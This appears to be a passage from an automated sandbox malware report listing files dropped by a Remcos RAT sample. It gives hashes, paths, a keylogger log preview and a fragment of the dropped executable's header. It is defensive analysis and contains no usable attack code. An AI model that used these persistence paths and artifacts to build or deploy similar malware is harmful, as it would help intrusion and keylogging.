                                                                                                                                                                                            SSDEEP:192:3ukuuuMuruIuBuDuLcuVu1iuCuXunuWuBuXBFuhiTuyug/umux+uTKmu1u8uKu7o:bSwBolKDRmFcCCUXStV3
                                                                                                                                                                                            MD5:30E79B41875CEDC8D308F829C872C422
                                                                                                                                                                                            SHA1:415F3D7802AD7398CE54B8F01D2F1FB4A23EF585
                                                                                                                                                                                            SHA-256:D607E237A69B569FA3B6A47618A0D9E312D4C4FCFAC209763BE0AF60EE08280C
                                                                                                                                                                                            SHA-512:1E14493B6727F977607EC61ECC7A4D8391A3A10D32BD157C634AB838AA25D3A8E9FC18D975EC53662ED7FCAB1BBC5DF23A09119BC7923EF1525316C040E32C9D
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\graias\logs.dat, Author: Joe Security
                                                                                                                                                                                            Preview:....[.2.0.2.5./.0.1./.0.4. .1.2.:.4.1.:.5.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.5./.0.1./.0.4. .1.2.:.4.1.:.5.6. .s.v.c.h.o.s.t...e.x.e. .-. .T.h.i.s. .a.p.p.l.i.c.a.t.i.o.n. .c.o.u.l.d. .n.o.t. .b.e. .s.t.a.r.t.e.d...].....[.W.i.n.].r.....[.2.0.2.5./.0.1./.0.4. .1.2.:.4.1.:.5.7. .R.u.n.].........[.2.0.2.5./.0.1./.0.4. .1.2.:.4.1.:.5.8. .s.v.c.h.o.s.t...e.x.e. .-. .T.h.i.s. .a.p.p.l.i.c.a.t.i.o.n. .c.o.u.l.d. .n.o.t. .b.e. .s.t.a.r.t.e.d...].........[.2.0.2.5./.0.1./.0.4. .1.2.:.4.2.:.0.0. .R.u.n.].........[.2.0.2.5./.0.1./.0.4. .1.2.:.4.2.:.0.0. .s.v.c.h.o.s.t...e.x.e. .-. .T.h.i.s. .a.p.p.l.i.c.a.t.i.o.n. .c.o.u.l.d. .n.o.t. .b.e. .s.t.a.r.t.e.d...].........[.2.0.2.5./.0.1./.0.4. .1.2.:.4.2.:.0.1. .U.n.t.i.t.l.e.d. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.2.0.2.5./.0.1./.0.4. .1.2.:.4.2.:.0.2. .s.v.c.h.o.s.t...e.x.e. .-. .T.h.i.s. .a.p.p.l.i.c.a.t.i.o.n. .c.o.u.l.d. .n.o.t. .b.e. .s.t.a.r.t.e.d...].........[.2.0.2.5./.0.1./.0.4. .1.2.:.4.2.:.0.4. .

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4XYAW8PbZH.exe.log

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\4XYAW8PbZH.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):1216
                                                                                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\graias.exe.log

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):1216
                                                                                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):963
                                                                                                                                                                                            Entropy (8bit):5.019506780280991
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzd:qlupdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                                            MD5:7459F6DA71CD5EAF9DBE2D20CA9434AC
                                                                                                                                                                                            SHA1:4F60E33E15277F7A632D8CD058EC7DF4728B40BC
                                                                                                                                                                                            SHA-256:364A445C3A222EE10A8816F78283BBD0503A5E5824B2A7F5DCD8E6DA9148AF6A
                                                                                                                                                                                            SHA-512:3A862711D78F6F97F07E01ACC0DCB54F595A23AACEA9F2BB9606382805E1E92C1ACE09E1446F312F3B6D4EE63435ABEF46F0C16F015BD505347A1BCF2E149841
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):2232
                                                                                                                                                                                            Entropy (8bit):5.380285623575084
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:+WSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//Zr0Uyus:+LHxvCsIfA2KRHmOugs1s
                                                                                                                                                                                            MD5:B7D8DBE281BCAF10437E6D76C2139747
                                                                                                                                                                                            SHA1:2DC80C630D1A78AF4AAFAF5915BB65061795C6D4
                                                                                                                                                                                            SHA-256:3DB2059FF44A96483D33493BC8964AB8A4BC3AB7BC580EEBF656D7F127693F5E
                                                                                                                                                                                            SHA-512:61447D2DE53AD8EBA2C34C1E284275CE2A0665CE4FCB29A159418E1220AE433A90FD9C36E95650F6663471D393486EF0C6671CA1A4FA6CDCB5A30EBCE3304CB1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0f4gafwu.vs5.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4i0to51w.ill.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5nwecnj5.llw.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drusz2kv.1zu.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iarzch4x.tvl.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lau2qrm0.3yn.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lviv4n50.3f5.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdflcyxw.ilk.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Graias\graias.exe

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\4XYAW8PbZH.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):985600
                                                                                                                                                                                            Entropy (8bit):7.901211828464333
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:fdFeteG2H+FLBvmhCWWmLiUZklZGIo/KCrB:FA9w+bvmhCWWpUZkbDo5rB
                                                                                                                                                                                            MD5:4A9440BAA61BE8363A372B0BBC5933AD
                                                                                                                                                                                            SHA1:9AA5380DC87829C6FA22E9029CADCAB9F6221EF9
                                                                                                                                                                                            SHA-256:51C0BCBC40451C10E3B56DF10853156378E8DBFB32EE63EA936737D42818822C
                                                                                                                                                                                            SHA-512:648BD4434CE14E15C3FABA25945525FFFEC6DAD028E8FE26982D70096CCD448CA6E114E10739B1E990EA65970DB97897713B8054450F1CD98C9AACB596436B0C
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....tg..............0......$......R.... ... ....@.. ....................................@.....................................O.... ...!...................`....................................................... ............... ..H............text...x.... ...................... ..`.rsrc....!... ..."..................@..@.reloc.......`......................@..B................4.......H........;.../......N...`k...............................................0..j..........|....(.....|....(....(.....{.....+?..%(.....o.......(....X(......%(.....o.......(....X(.....{......-..*...0..5........{....o.....+...(.....o=.....(....-...........o.....*............&.......0..N........{....,?.{....o.....+...(.....}......(....-...........o......{....o.....{....*...................0..Y........{.....o .....o.......(.....(.......(....Y.o.......(.....(.......(....Ys....o......}

                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Graias\graias.exe:Zone.Identifier

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\4XYAW8PbZH.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                                            Entropy (8bit):4.468681999604878
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:AIXfpi67eLPU9skLmb0b4AWSPKaJG8nAgejZMMhA2gX4WABl0uNrdwBCswSbNI:FXD94AWlLZMM6YFHl+N
                                                                                                                                                                                            MD5:E6B4BD84A620703D003F703C6B6828EA
                                                                                                                                                                                            SHA1:30305245C893CFE123008FB1DD8AB19D30CEE5F4
                                                                                                                                                                                            SHA-256:A53B3BB5F1B711F916214786659272BC1CA5A70821E577F352F33BC2E4E98A23
                                                                                                                                                                                            SHA-512:D4383E3114ED4AE1E428B63F71EA5205391DA0F8DCB714089E74CA1B5FE9609582828427CC5DACDA7E63CF6E9BCCA51196596562C0A8BCBD74BC07141118F904
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....^.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            Chrome Cache Entry: 277

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):13339
                                                                                                                                                                                            Entropy (8bit):7.683569563478597
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                            MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                            SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                            SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                            SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

                                                                                                                                                                                            Chrome Cache Entry: 278

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1432
                                                                                                                                                                                            Entropy (8bit):4.986131881931089
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                            MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                            SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                            SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                            SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                            Malicious:false
